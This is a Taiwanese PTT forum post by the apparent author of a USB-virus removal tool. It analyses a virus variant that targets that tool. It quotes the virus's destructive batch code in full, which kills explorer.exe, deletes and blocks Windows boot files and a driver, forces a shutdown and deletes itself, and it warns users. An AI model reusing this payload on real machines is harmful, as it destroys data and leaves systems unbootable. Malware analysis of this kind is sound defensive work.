[閒聊] 有意思了...
這一次碰到的隨身碟資料夾型病毒很有意思
感謝香菇小精靈隨身碟病毒清除作者提供了一些資訊
是這樣的.
前幾天我有跟人提到就是台灣製的隨身碟病毒
這個隨身碟病毒有變種
而他這一次的變種有針對EFix而來.
這還第一次碰到....還蠻有意思的
香菇小精靈有提到該病毒會檢測系統裡面的程序
該批次代碼如下:
tasklist|findstr /c:"ef.com" && (goto :kill)
:kill
taskkill /F /IM explorer.exe
del /f /s /q /a:h %SystemDrive%\boot.ini
del /f /s /q /a:h %SystemDrive%\IO.sys
del /f /s /q /a:h %SystemDrive%\CONFIG.SYS
del /f /s /q /a:h %SystemDrive%\ntldr
del /f /s /q /a:h %SystemDrive%\AUTOEXEC.BAT
del /f /s /q /a:h %SystemDrive%\MSDOS.SYS
md %SystemDrive%\boot.ini
md %SystemDrive%\IO.sys
md %SystemDrive%\CONFIG.SYS
md %SystemDrive%\ntldr
md %SystemDrive%\AUTOEXEC.BAT
md %SystemDrive%\MSDOS.SYS
del /f /s /q "%windir%\system32\drivers\pci.sys"
md "%windir%\system32\drivers\pci.sys"
shutdown -f -s -t 0
del %0
上面的代碼我大概解釋一下
該病毒使用tasklist 這一段指令去檢查執行中的程序裡面有沒有一個叫做 ef.com的程序
有的話,就刪除上面從:kill之後的檔案並建立資料夾讓你沒辦法複製回去
然而ef.com 就是EFix使用的主運作程序....XD
所以我想之前有一位版友有碰到ntldr移失的,我看大概就是因為這樣的原因
好樣的....
我這兩天會找時間再做一些修改,看看能不能突破這惡意攻擊...
有中的人自己先小心點.
--
暮色逼近的雲朵之上,總是孤單一隻地飛著,老鷹一定很悲傷吧
在聲音也中斷的風之中,抓住天空的那對翅膀,無法休息
把心比喻成什麼吧,宛如老鷹一般的這顆心
把心比喻成什麼吧,比喻為宛如在天空飛舞般的悲傷
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 61.216.81.78
※ 編輯: junorn 來自: 61.216.81.78 (08/23 01:22)
推
08/23 01:27, , 1F
08/23 01:27, 1F
→
08/23 01:28, , 2F
08/23 01:28, 2F
→
08/23 01:28, , 3F
08/23 01:28, 3F
→
08/23 01:29, , 4F
08/23 01:29, 4F
→
08/23 01:29, , 5F
08/23 01:29, 5F
→
08/23 01:29, , 6F
08/23 01:29, 6F
推
08/23 01:34, , 7F
08/23 01:34, 7F
推
08/23 01:45, , 8F
08/23 01:45, 8F
→
08/23 01:46, , 9F
08/23 01:46, 9F
→
08/23 01:47, , 10F
08/23 01:47, 10F
→
08/23 01:47, , 11F
08/23 01:47, 11F
→
08/23 01:48, , 12F
08/23 01:48, 12F
推
08/23 02:59, , 13F
08/23 02:59, 13F
→
08/23 03:00, , 14F
08/23 03:00, 14F
推
08/23 07:52, , 15F
08/23 07:52, 15F
推
08/23 09:21, , 16F
08/23 09:21, 16F
→
08/23 13:20, , 17F
08/23 13:20, 17F
→
08/23 13:54, , 18F
08/23 13:54, 18F
→
08/23 13:55, , 19F
08/23 13:55, 19F
→
08/23 13:55, , 20F
08/23 13:55, 20F
推
08/23 16:03, , 21F
08/23 16:03, 21F
推
08/23 17:13, , 22F
08/23 17:13, 22F
推
08/23 21:05, , 23F
08/23 21:05, 23F
→
08/23 21:06, , 24F
08/23 21:06, 24F
→
08/23 21:06, , 25F
08/23 21:06, 25F
→
08/23 21:08, , 26F
08/23 21:08, 26F
→
08/23 21:09, , 27F
08/23 21:09, 27F
→
08/23 21:10, , 28F
08/23 21:10, 28F
→
08/23 21:10, , 29F
08/23 21:10, 29F
→
08/23 21:11, , 30F
08/23 21:11, 30F
→
08/23 21:30, , 31F
08/23 21:30, 31F
→
08/23 21:31, , 32F
08/23 21:31, 32F
→
08/23 21:31, , 33F
08/23 21:31, 33F
→
08/23 21:33, , 34F
08/23 21:33, 34F
→
08/23 21:33, , 35F
08/23 21:33, 35F
→
08/23 21:34, , 36F
08/23 21:34, 36F
推
08/23 22:32, , 37F
08/23 22:32, 37F
→
08/23 22:33, , 38F
08/23 22:33, 38F
→
08/23 22:44, , 39F
08/23 22:44, 39F
→
08/23 22:45, , 40F
08/23 22:45, 40F
→
08/23 22:45, , 41F
08/23 22:45, 41F
推
08/24 13:55, , 42F
08/24 13:55, 42F
AntiVirus 近期熱門文章
PTT數位生活區 即時熱門文章
18
40